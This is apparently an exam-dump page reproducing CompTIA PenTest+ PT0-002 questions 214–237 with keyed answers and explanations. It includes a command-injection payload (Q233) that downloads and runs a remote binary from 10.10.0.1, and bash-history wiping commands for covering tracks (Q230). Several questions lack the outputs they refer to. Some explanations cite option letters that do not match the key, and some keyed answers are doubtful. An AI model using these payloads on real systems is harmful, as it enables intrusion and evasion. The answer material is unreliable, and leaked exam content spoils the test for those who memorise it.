• Home
  • Articles
  • [2024] Pass CompTIA PT0-002 Premium Files Test Engine pdf - Free Dumps Collection [Q214-Q237]

[2024] Pass CompTIA PT0-002 Premium Files Test Engine pdf - Free Dumps Collection [Q214-Q237]

Share

[2024] Pass CompTIA PT0-002 Premium Files Test Engine pdf - Free Dumps Collection

New 2024 Realistic PT0-002 Dumps Test Engine Exam Questions in here

NEW QUESTION # 214
After compromising a system, a penetration tester wants more information in order to decide what actions to take next. The tester runs the following commands:

Which of the following attacks is the penetration tester most likely trying to perform?

  • A. Metadata service attack
  • B. Resource exhaustion
  • C. Container escape techniques
  • D. Credential harvesting

Answer: A

Explanation:
The penetration tester is most likely trying to perform a metadata service attack, which is an attack that exploits a vulnerability in the metadata service of a cloud provider. The metadata service is a service that provides information about the cloud instance, such as its IP address, hostname, credentials, user data, or role permissions. The metadata service can be accessed from within the cloud instance by using a special IP address, such as 169.254.169.254 for AWS, Azure, and GCP. The commands that the penetration tester runs are curl commands, which are used to transfer data from or to a server. The curl commands are requesting data from the metadata service IP address with different paths, such as /latest/meta-data/iam/security-credentials/ and /latest/user-data/. These paths can reveal sensitive information about the cloud instance, such as its IAM role credentials or user data scripts. The penetration tester may use this information to escalate privileges, access other resources, or perform other actions on the cloud environment. The other options are not likely attacks that the penetration tester is trying to perform.


NEW QUESTION # 215
A penetration tester discovered a vulnerability that provides the ability to upload to a path via directory traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

  • A. Edit the discovered file with one line of code for remote callback
  • B. Download the smb.conf file and look at configurations
  • C. Download .pl files and look for usernames and passwords
  • D. Edit the smb.conf file and upload it to the server

Answer: D


NEW QUESTION # 216
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?

  • A. Perform forensic analysis to isolate the means of compromise and determine attribution.
  • B. Halt the assessment and follow the reporting procedures as outlined in the contract.
  • C. Incorporate the newly identified method of compromise into the red team's approach.
  • D. Create a detailed document of findings before continuing with the assessment.

Answer: B


NEW QUESTION # 217
A penetration tester is performing an assessment of an application that allows users to upload documents to a cloud-based file server for easy access anywhere in the world. Which of the following would most likely allow a tester to access unintentionally exposed documents?

  • A. Directory traversal attack
  • B. Cross-site scripting attack
  • C. Session attack
  • D. Cross-site request forgery

Answer: A

Explanation:
A directory traversal attack, also known as a path traversal attack, is a method used to exploit insufficient security validation or sanitization of user-supplied input file names. The goal of this attack is to access directories and files that are stored outside the web root folder. By manipulating variables that reference files with "../" sequences and its variations, attackers can access restricted directories and execute commands outside of the web server's root directory.
In the context of an application that allows users to upload documents to a cloud-based file server, an attacker might exploit a directory traversal vulnerability to navigate to directories that contain sensitive documents. If the file upload functionality is not properly secured, an attacker could upload a file with a payload designed to perform directory traversal. This could allow access to confidential files that are otherwise protected by the application's access control mechanisms.
References:
* OWASP Directory Traversal Cheat Sheet: OWASP Directory Traversal
* Practical example from HTB Writeups like Forge and Anubis which demonstrate similar enumeration techniques leading to sensitive file disclosures.


NEW QUESTION # 218
A penetration tester attempted a DNS poisoning attack. After the attempt, no traffic was seen from the target machine. Which of the following MOST likely caused the attack to fail?

  • A. The DNS cache was not refreshed.
  • B. The DNS information was incorrect.
  • C. The client did not receive a trusted response.
  • D. The injection was too slow.

Answer: A

Explanation:
Explanation
A DNS poisoning attack is an attack that exploits a vulnerability in the DNS protocol or system to redirect traffic from legitimate websites to malicious ones. A DNS poisoning attack works by injecting false DNS records into a DNS server or resolver's cache, which is a temporary storage of DNS information. However, if the DNS cache was not refreshed, then the attack would fail, as the target machine would still use the old and valid DNS records from its cache. The other options are not likely causes of the attack failure.


NEW QUESTION # 219
Which of the following describe the GREATEST concerns about using third-party open-source libraries in application code? (Choose two.)

  • A. The provenance of code is unknown
  • B. The licensing of software is ambiguous
  • C. The libraries' code bases could be read by anyone
  • D. The libraries may be unsupported
  • E. The libraries may be vulnerable
  • F. The libraries may break the application

Answer: A,E

Explanation:
A: The libraries may be vulnerable to security bugs or exploits that can compromise the application or the data. According to the web search results, open-source libraries often have vulnerabilities that can be exploited by attackers, such as Heartbleed, Shellshock, DROWN, or npm left-pad1234. These vulnerabilities can allow attackers to extract sensitive data, execute arbitrary commands, decrypt encrypted traffic, or break the functionality of the application. Therefore, using third-party open-source libraries in application code poses a significant security risk.
D: The provenance of code is unknown, meaning that the origin and history of the code are not verified or documented. According to the web search results, open-source libraries and client projects are developed and continuously evolving in an asynchronous way, which makes it difficult to track the changes and updates of the code2. Moreover, open-source libraries may have dependencies on other libraries, which can introduce additional risks or vulnerabilities1. Therefore, using third-party open-source libraries in application code poses a significant quality risk.


NEW QUESTION # 220
A penetration tester discovered that a client uses cloud mail as the company's email system. During the penetration test, the tester set up a fake cloud mail login page and sent all company employees an email that stated their inboxes were full and directed them to the fake login page to remedy the issue. Which of the following BEST describes this attack?

  • A. Credential harvesting
  • B. Privilege escalation
  • C. Password spraying
  • D. Domain record abuse

Answer: A

Explanation:
Explanation
Credential harvesting is a type of attack that aims to collect usernames and passwords from unsuspecting users by tricking them into entering their credentials on a fake or spoofed website. Credential harvesting can be done by using phishing emails that lure users to click on malicious links or attachments that redirect them to the fake website. The fake website may look identical or similar to the legitimate one, but it will capture and store the user's credentials for later use by the attacker. In this case, the penetration tester set up a fake cloud mail login page and sent phishing emails to all company employees to harvest their credentials.


NEW QUESTION # 221
A penetration tester wrote the following script to be used in one engagement:

Which of the following actions will this script perform?

  • A. Listen for a reverse shell.
  • B. Attempt to flood open ports.
  • C. Create an encrypted tunnel.
  • D. Look for open ports.

Answer: D

Explanation:
The script will perform a port scan on the target IP address, looking for open ports on a list of common ports.
A port scan is a technique that probes a network or a system for open ports, which can reveal potential vulnerabilities or services running on the host.


NEW QUESTION # 222
The following output is from reconnaissance on a public-facing banking website:

Based on these results, which of the following attacks is MOST likely to succeed?

  • A. An attack on a session ticket extension (Ticketbleed)
  • B. A birthday attack on 64-bit ciphers (Sweet32)
  • C. A Heartbleed attack
  • D. An attack that breaks RC4 encryption

Answer: D


NEW QUESTION # 223
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

  • A. The edge network device was disconnected.
  • B. The scan returned ICMP echo replies.
  • C. The penetration tester used unsupported flags.
  • D. A firewall or IPS blocked the scan.

Answer: D


NEW QUESTION # 224
A penetration tester performs several Nmap scans against the web application for a client.
INSTRUCTIONS
Click on the WAF and servers to review the results of the Nmap scans. Then click on each tab to select the appropriate vulnerability and remediation options.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.




Answer:

Explanation:
See the explanation part for detailed solution.
Explanation:


Most likely vulnerability: Perform a SSRF attack against App01.example.com from CDN.example.com.
The scenario suggests that the CDN network (with a WAF) can be used to perform a Server-Side Request Forgery (SSRF) attack. Since the penetration tester has the pentester workstation interacting through the CDN/WAF and the production network is behind it, the most plausible attack vector is to exploit SSRF to interact with the internal services like App01.example.com.
Two best remediation options:
* Restrict direct communications to App01.example.com to only approved components.
* Require an additional authentication header value between CDN.example.com and App01.example.com.
* Restrict direct communications to App01.example.com to only approved components: This limits the exposure of the application server by ensuring that only specified, trusted entities can communicate with it.
* Require an additional authentication header value between CDN.example.com and App01.example.com: Adding an authentication layer between the CDN and the app server helps ensure that requests are legitimate and originate from trusted sources, mitigating SSRF and other indirect attack vectors.
Nmap Scan Observations:
* CDN/WAF shows open ports for HTTP and HTTPS but filtered for MySQL, indicating it acts as a filtering layer.
* App Server has open ports for HTTP, HTTPS, and filtered for MySQL.
* DB Server has all ports filtered, typical for a database server that should not be directly accessible.
These findings align with the SSRF vulnerability and the appropriate remediation steps to enhance the security of internal communications.


NEW QUESTION # 225
Which of the following web-application security risks are part of the OWASP Top 10 v2017? (Choose two.)

  • A. Injection flaws
  • B. Zero-day attacks
  • C. Ransomware attacks
  • D. Race-condition attacks
  • E. Cross-site scripting
  • F. Buffer overflows

Answer: A,E

Explanation:
A01-Injection
A02-Broken Authentication
A03-Sensitive Data Exposure
A04-XXE
A05-Broken Access Control
A06-Security Misconfiguration
A07-XSS
A08-Insecure Deserialization
A09-Using Components with Known Vulnerabilities
A10-Insufficient Logging & Monitoring
Reference:
Cross-site scripting (XSS) and injection flaws are two of the web-application security risks that are part of the OWASP Top 10 v2017 list. XSS is a type of attack that injects malicious scripts into web pages or applications that are viewed by other users, resulting in compromised sessions, stolen cookies, or redirected browsers. Injection flaws are a type of attack that exploits a vulnerability in an application's data input or output, such as SQL injection, command injection, or LDAP injection, resulting in unauthorized access, data loss, or remote code execution. The other options are not part of the OWASP Top 10 v2017 list.


NEW QUESTION # 226
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

  • A. Analyze the malware to see what it does.
  • B. Remove the malware immediately.
  • C. Collect the proper evidence and then remove the malware.
  • D. Stop the assessment and inform the emergency contact.
  • E. Do a root-cause analysis to find out how the malware got in.

Answer: D

Explanation:
Stopping the assessment and informing the emergency contact is the best thing to do next after identifying that an application being tested has already been compromised with malware. This is because continuing the assessment might interfere with an ongoing investigation or compromise evidence collection. The emergency contact is the person designated by the client who should be notified in case of any critical issues or incidents during the penetration testing engagement.


NEW QUESTION # 227
A penetration tester runs the following command on a system:
find / -user root -perm -4000 -print 2>/dev/null
Which of the following is the tester trying to accomplish?

  • A. Set the SGID on all files in the / directory
  • B. Find the /root directory on the system
  • C. Find files that were created during exploitation and move them to /dev/null
  • D. Find files with the SUID bit set

Answer: D

Explanation:
the 2>/dev/null is output redirection, it simply sends all the error messages to infinity and beyond preventing any error messages to appear in the terminal session.


NEW QUESTION # 228
A penetration tester is conducting an assessment on 192.168.1.112. Given the following output:

Which of the following is the penetration tester conducting?

  • A. Credential stuffing
  • B. Brute force
  • C. Port scan
  • D. DoS attack

Answer: B

Explanation:
The output shows multiple login attempts with different passwords for the same username "root" on the IP address 192.168.1.112. This is indicative of a brute force attack, where an attacker systematically tries various password combinations to gain unauthorized access. References: The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 4: Conducting Passive Reconnaissance; The Official CompTIA PenTest+ Student Guide (Exam PT0-002), Lesson 4: Conducting Active Reconnaissance.


NEW QUESTION # 229
A potential reason for communicating with the client point of contact during a penetration test is to provide resolution if a testing component crashes a system or service and leaves them unavailable for both legitimate users and further testing. Which of the following best describes this concept?

  • A. Remediation
  • B. Retesting
  • C. Collision detection
  • D. De-escalation

Answer: A

Explanation:
Communicating with the client point of contact during a penetration test, especially when a testing component crashes a system or service, is crucial for remediation. Remediation involves the process of correcting or mitigating vulnerabilities that have been identified during the test. In the context of a system or service becoming unavailable, it's essential to promptly address and resolve the issue to restore availability and ensure the continuity of legitimate business operations. This communication ensures that the client is aware of the incident and can work together with the penetration tester to implement corrective actions, thereby minimizing the impact on the business and further testing activities.


NEW QUESTION # 230
A penetration tester gains access to a system and establishes persistence, and then runs the following commands:
cat /dev/null > temp
touch -r .bash_history temp
mv temp .bash_history
Which of the following actions is the tester MOST likely performing?

  • A. Making a copy of the user's Bash history for further enumeration
  • B. Making decoy files on the system to confuse incident responders
  • C. Covering tracks by clearing the Bash history
  • D. Redirecting Bash history to /dev/null

Answer: C

Explanation:
The commands are used to clear the Bash history file of the current user, which records the commands entered in the terminal. The first command redirects /dev/null (a special file that discards any data written to it) to temp, which creates an empty file named temp. The second command changes the timestamp of temp to match that of .bash_history (the hidden file that stores the Bash history). The third command renames temp to
.bash_history, which overwrites the original file with an empty one. This effectively erases any trace of the commands executed by the user.


NEW QUESTION # 231
Which of the following tools would be best suited to perform a cloud security assessment?

  • A. Nessus
  • B. OpenVAS
  • C. ZAP
  • D. Scout Suite
  • E. Nmap

Answer: D

Explanation:
Explanation
The tool that would be best suited to perform a cloud security assessment is Scout Suite, which is an open-source multi-cloud security auditing tool that can evaluate the security posture of cloud environments, such as AWS, Azure, GCP, or Alibaba Cloud. Scout Suite can collect configuration data from cloud providers using APIs and assess them against security best practices or benchmarks, such as CIS Foundations. Scout Suite can generate reports that highlight security issues, risks, or gaps in the cloud environment, and provide recommendations for remediation or improvement. The other options are not tools that are specifically designed for cloud security assessment. OpenVAS is an open-source vulnerability scanner that can scan hosts and networks for vulnerabilities and generate reports with findings and recommendations. Nmap is an open-source network scanner and enumerator that can scan hosts and networks for ports, services, versions, OS, or other information1. ZAP is an open-source web application scanner and proxy that can scan web applications for vulnerabilities and perform attacks such as SQL injection or XSS. Nessus is a commercial vulnerability scanner that can scan hosts and networks for vulnerabilities and generate reports with findings and recommendations.


NEW QUESTION # 232
A penetration tester runs the following command:
nmap -p- -A 10.0.1.10
Given the execution of this command, which of the following quantities of ports will Nmap scan?

  • A. 1,024
  • B. 10,000
  • C. 1,000
  • D. 65,535

Answer: D

Explanation:
The nmap command with the -p- flag scans all ports from 1 to 65535 on the target host. The -A flag enables OS detection, version detection, script scanning, and traceroute. Therefore, the command will scan 65,535 ports on the host 10.0.1.10 and perform additional analysis on the open ports. References:
*The Official CompTIA PenTest+ Study Guide (Exam PT0-002), Chapter 2: Conducting Passive Reconnaissance, page 72-73.
*Nmap Cheat Sheet 2024: All the Commands & Flags - StationX1
*Nmap Commands - 17 Basic Commands for Linux Network - phoenixNAP2


NEW QUESTION # 233
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:
exploit = "POST "
exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a"
exploit += "HTTP/1.1"
Which of the following commands should the penetration tester run post-engagement?

  • A. grep -v apache ~/.bash_history > ~/.bash_history
  • B. chmod 600 /tmp/apache
  • C. taskkill /IM "apache" /F
  • D. rm -rf /tmp/apache

Answer: D

Explanation:
The exploit code is a command injection attack that uses a vulnerable CGI script to execute arbitrary commands on the target system. The commands are:
cd /tmp: change the current directory to /tmp
wget http://10.10.0.1/apache: download a file named apache from http://10.10.0.1
chmod 777 apache: change the permissions of the file to allow read, write, and execute for everyone
./apache: run the file as an executable
The file apache is most likely a malicious payload that gives the attacker remote access to the system or performs some other malicious action. Therefore, the penetration tester should run the command rm -rf /tmp/apache post-engagement to remove the file and its traces from the system. The other commands are not effective or relevant for this purpose.


NEW QUESTION # 234
A penetration tester ran the following commands on a Windows server:

Which of the following should the tester do AFTER delivering the final report?

  • A. Delete the scheduled batch job.
  • B. Downgrade the svsaccount permissions.
  • C. Remove the tester-created credentials.
  • D. Close the reverse shell connection.

Answer: C


NEW QUESTION # 235
A penetration tester who is conducting a web-application test discovers a clickjacking vulnerability associated with a login page to financial data. Which of the following should the tester do with this information to make this a successful exploit?

  • A. Use browser autopwn.
  • B. Use BeEF.
  • C. Conduct a watering-hole attack.
  • D. Perform XSS.

Answer: C

Explanation:
A clickjacking vulnerability allows an attacker to trick a user into clicking on a hidden element on a web page, such as a login button or a link. A watering-hole attack is a technique where the attacker compromises a website that is frequently visited by the target users, and injects malicious code or content into the website.
The attacker can then use the clickjacking vulnerability to redirect the users to a malicious website or perform unauthorized actions on their behalf.
A: Perform XSS. This is incorrect. XSS (cross-site scripting) is a vulnerability where an attacker injects malicious scripts into a web page that are executed by the browser of the victim. XSS can be used to steal cookies, session tokens, or other sensitive information, but it is not directly related to clickjacking.
C: Use BeEF. This is incorrect. BeEF (Browser Exploitation Framework) is a tool that allows an attacker to exploit various browser vulnerabilities and take control of the browser of the victim. BeEF can be used to launch clickjacking attacks, but it is not the only way to do so.
D: Use browser autopwn. This is incorrect. Browser autopwn is a feature of Metasploit that automatically exploits browser vulnerabilities and delivers a payload to the victim's system. Browser autopwn can be used to compromise the browser of the victim, but it is not directly related to clickjacking.
References:
* 1: OWASP Foundation, "Clickjacking", https://owasp.org/www-community/attacks/Clickjacking
* 2: PortSwigger, "What is clickjacking? Tutorial & Examples",
https://portswigger.net/web-security/clickjacking
* 4: Akto, "Clickjacking: Understanding vulnerability, attacks and prevention",
https://www.akto.io/blog/clickjacking-understanding-vulnerability-attacks-and-prevention


NEW QUESTION # 236
Company.com has hired a penetration tester to conduct a phishing test. The tester wants to set up a fake log-in page and harvest credentials when target employees click on links in a phishing email. Which of the following commands would best help the tester determine which cloud email provider the log-in page needs to mimic?

  • A. cur1 www.company.com
  • B. dig company.com A
  • C. dig company.com MX
  • D. whois company.com

Answer: C

Explanation:
Explanation
The dig command is a tool that can be used to query DNS servers and obtain information about domain names, such as IP addresses, mail servers, name servers, or other records. The MX option specifies that the query is for mail exchange records, which are records that indicate the mail servers responsible for accepting email messages for a domain. Therefore, the command dig company.com MX would best help the tester determine which cloud email provider the log-in page needs to mimic by showing the mail servers for company.com. For example, if the output shows something like company-com.mail.protection.outlook.com, then it means that company.com uses Microsoft Outlook as its cloud email provider. The other commands are not as useful for determining the cloud email provider. The whois command is a tool that can be used to query domain name registration information, such as the owner, registrar, or expiration date of a domain. The curl command is a tool that can be used to transfer data from or to a server using various protocols, such as HTTP, FTP, or SMTP. The dig command with the A option specifies that the query is for address records, which are records that map domain names to IP addresses.


NEW QUESTION # 237
......

Updated Official licence for PT0-002 Certified by PT0-002 Dumps PDF: https://torrentpdf.validvce.com/PT0-002-exam-collection.html

Related Articles

more
CompTIA PT0-002 Certification Practice Exam

We are dedicated in providing the most reliable and latest vce dumps for certification exam, our valid dumps and free vce files will guarantee you pass test 100%.

Latest VCE Dumps

Useful Links

Contact Us

Our Working Time: ( GMT 0:00-15:00 )
From Monday to Saturday

Support: Contact now 

If you have any question please leave me your email address, we will reply and send email to you in 12 hours.

Copyright © 2026 ValidVCE NETWORK CO.,LIMITED. All Rights Reserved. All trademarks used are properties of their respective owners. Privacy Policy